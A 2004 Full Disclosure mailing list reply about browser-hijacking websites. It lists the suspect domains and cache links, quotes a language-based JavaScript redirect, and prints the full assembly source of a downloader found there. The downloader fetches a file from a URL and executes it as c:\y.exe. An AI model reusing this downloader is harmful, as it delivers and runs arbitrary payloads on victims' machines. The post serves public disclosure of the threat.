Full Disclosure mailing list archives
Re: browser hijack by apache sites
From: Matthijs Dalhuijsen <thijs () dalhuijsen com>
Date: Wed, 26 May 2004 04:45:42 +0200
On 24-May-04, at 14:46, Feher Tamas wrote:
http://www.b00gle.com/fa/?d=get
good thing the internet has a memory :)
http://216.239.59.104/search?q=cache:yYCmQqdLUvMJ:www.b00gle.com/fa/%3Fd%3Dget+&hl=en
http://www.google.com/search?q=cache:iyMDunIkp08J:www.b00gle.com/fa/tool.html+&hl=en
http://www.pizdato.biz/acc1/ to http://www.pizdato.biz/acc9/ show the same files, as if copied in a for loop
i especially liked 2 files in the dir; counter.htm containing the extremely funny
<script language="JavaScript">
<!--
var lang = navigator.systemLanguage;
if (lang == "ru") document.location = "home.html";
//-->
</script>

but then i saw this:
http://www.pizdato.biz/acc10/2DimensionOfExploits.asm

Hehehe, Open Source is getting big!, didn't see no GPL licence so i hope I'm not violating someone's copyright by posting this here,....

.386
.model flat,stdcall
option casemap:none
include \masm32\include\windows.inc
include \masm32\include\kernel32.inc
includelib \masm32\lib\kernel32.lib
include \masm32\include\user32.inc
includelib \masm32\lib\user32.lib
.data
szLibrary db "urlmon.dll",0
szFunction db "URLDownloadToFileA",0
szFileName db "c:\y.exe", 0
.code
start:
invoke GetCommandLineA
add ax, 0Ah
lea ecx, [eax]
push ecx
invoke LoadLibrary, addr szLibrary
invoke GetProcAddress, eax, addr szFunction
pop ecx
push 0
push 0
lea ebx, [szFileName]
push ebx
push ecx
push 0
call eax
invoke WinExec, addr szFileName, 1
invoke ExitProcess, NULL
end start
Yet i do feel a bit suspicious about this set of files;,... bit TOO
educating i think ;)
cheers! thijs
--
If i had 6 hours to chop down a tree, I'd spend the first four sharpening the axe.
-- Abraham Lincoln
_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.netsys.com/full-disclosure-charter.html
